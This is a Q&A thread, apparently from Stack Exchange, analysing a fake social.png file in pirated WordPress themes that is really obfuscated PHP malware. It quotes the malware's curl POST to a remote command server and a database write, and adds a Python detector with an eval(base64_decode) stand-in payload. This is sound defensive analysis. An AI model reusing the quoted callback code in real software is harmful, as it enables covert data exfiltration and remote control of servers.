2

I have downloaded some WordPress themes from a website and I have noticed a strange include of a social.png file. Looking at this file, it is not a real PNG file but a PHP script that contains difficult-to-understand obfuscated code, and the same is true for many WordPress plugins distributed from other sites.

The file size is 45 KB and it has this hash: 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

Does someone have an idea of the function of this file?

THIS is the file

AndreaF

3 Answers

7

According to this forum post:

Basically, it is a remote shell callback that uses public key encryption to only allow the hacker to run code on your server. It generates a per-install RSA key pair, uploads it to the command server (which it has a preseeded list of, but can dynamically update from other infected hosts to avoid being shut down) using an embedded key, and also sends through a list of capabilities (eval/exec enabled, server information) and emails it through to a list of emails found in the file.

It's using Wordpress's config system to store its data, so have a look in your database for a setting key called WP_CLIENT_KEY which will look like a bunch of garbled text.

Once active, the exploit will take a list of commands to eval on the server - probably more shells or exploits - and also inject strings into the page footer. These strings are probably blackhat SEO spam, but it also injects a list of command and control servers that it is in contact with as well - so any other infected sites will be using your server to find others.

As I noted in the comments, the script will update and store data in the WP database:

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

Which as the forum post pointed out, is for the script's own access. The script also sends data, presumably the public key, to a specified server through a shell POST request:

// $gXNjWLFkUQOugyREMXKv holds the remote host; the request goes out over plain HTTP
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
// if a payload has been prepared, it is sent as the POST body
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

Regardless of the exact purpose of the script, you should delete all references to it and attempt to rid yourself of the script completely.

Charlie
  • How do I clear this completely? I mean, apart from the plugin folder, how do I remove all the rows that this created in the DB? – Dr.jacky Nov 26 '14 at 13:33
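The answer above gives two concrete things to look for: image-named files that are really PHP (and the theme or plugin code that includes them), and a WP_CLIENT_KEY row in the WordPress options table. The script below is an added example written for this page, not code from the thread or from the malware: it walks a WordPress tree checking image files against their format's magic bytes and for a PHP open tag, greps PHP files for include/require statements that name an image file, and queries the options table for the marker. The sample site and the SQLite stand-in for wp_options are constructed here so the script runs offline; on a real install point it at the document root and run the same query against MySQL. The table and column names (wp_options, option_name, option_value) are those of a stock WordPress install and are an assumption about your site.

```python
"""Find PHP code disguised as image files in a WordPress tree and check
the options table for the WP_CLIENT_KEY marker. Added example only."""
import os
import re
import sqlite3
import tempfile

# Leading bytes a genuine image of each extension must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
PHP_TAG = re.compile(rb"<\?php|<\?=")
# include/require whose argument ends in an image extension,
# e.g. include dirname(__FILE__) . '/images/social.png';
IMAGE_INCLUDE = re.compile(
    rb"\b(include|include_once|require|require_once)\b[^;]*?\.(png|jpe?g|gif)\b",
    re.I,
)


def fake_images(root):
    """Paths of files with an image extension that lack the image's magic
    bytes and contain a PHP open tag in their first 4 KiB."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in MAGIC:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if not head.startswith(MAGIC[ext]) and PHP_TAG.search(head):
                hits.append(path)
    return sorted(hits)


def image_includes(root):
    """(php_file, statement) pairs where a PHP file includes an image-named file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            for m in IMAGE_INCLUDE.finditer(data):
                hits.append((path, m.group(0).decode("latin-1")))
    return sorted(hits)


def suspicious_options(conn, table="wp_options"):
    """Option names containing WP_CLIENT_KEY. `table` is code-controlled,
    never user input, so interpolating it is safe here."""
    rows = conn.execute(
        f"SELECT option_name FROM {table} WHERE option_name LIKE '%WP_CLIENT_KEY%'"
    )
    return [r[0] for r in rows]


def build_sample_site():
    """Constructed sample tree (not real data): a genuine PNG, a PHP file
    named social.png, and a functions.php that includes it."""
    root = tempfile.mkdtemp()
    img = os.path.join(root, "images")
    os.makedirs(img)
    with open(os.path.join(img, "logo.png"), "wb") as fh:
        fh.write(MAGIC[".png"] + b"\x00" * 32)
    with open(os.path.join(img, "social.png"), "wb") as fh:
        # stand-in for the obfuscated payload; not the real file's contents
        fh.write(b"<?php eval(base64_decode('...')); ?>")
    with open(os.path.join(root, "functions.php"), "wb") as fh:
        fh.write(b"<?php\ninclude dirname(__FILE__) . '/images/social.png';\n")
    return root


def build_sample_db():
    """Constructed in-memory stand-in for the WordPress options table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, "
        "option_name TEXT, option_value TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value) VALUES (?, ?)",
        [("siteurl", "http://example.invalid"), ("WP_CLIENT_KEY", "Ab3x...garbled...")],
    )
    return conn


if __name__ == "__main__":
    site = build_sample_site()
    print("PHP disguised as images:", fake_images(site))
    print("includes of image-named files:", image_includes(site))
    print("suspicious options:", suspicious_options(build_sample_db()))
```

Finding the files is only the first step: as the answer says, the option row and every include of the file have to go too, and because the payload can eval arbitrary commands fetched from its controllers, anything else on the host should be treated as potentially modified.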
2

It is a WordPress hacking trick via false PNG images. Be careful!

Dipak G.
  • Which makes a `CURL` request posting whatever data to the URL stored in the `$gXNjWLFkUQOugyREMXKv` variable, which would be hard to determine without running the script and echoing the created URL... – Charlie Jul 26 '14 at 05:17
  • It also attempts to modify some database. – Charlie Jul 26 '14 at 05:18
0

@AndreaF - Shocking, really? The social.png CryptoPHP hacker file is only in pirated/stolen software (plugins, themes, etc.). This type of Trojan horse hacking has been going on forever. If you try to get something pirated/stolen for free, then expect to suffer the consequences.

Ed-AITpro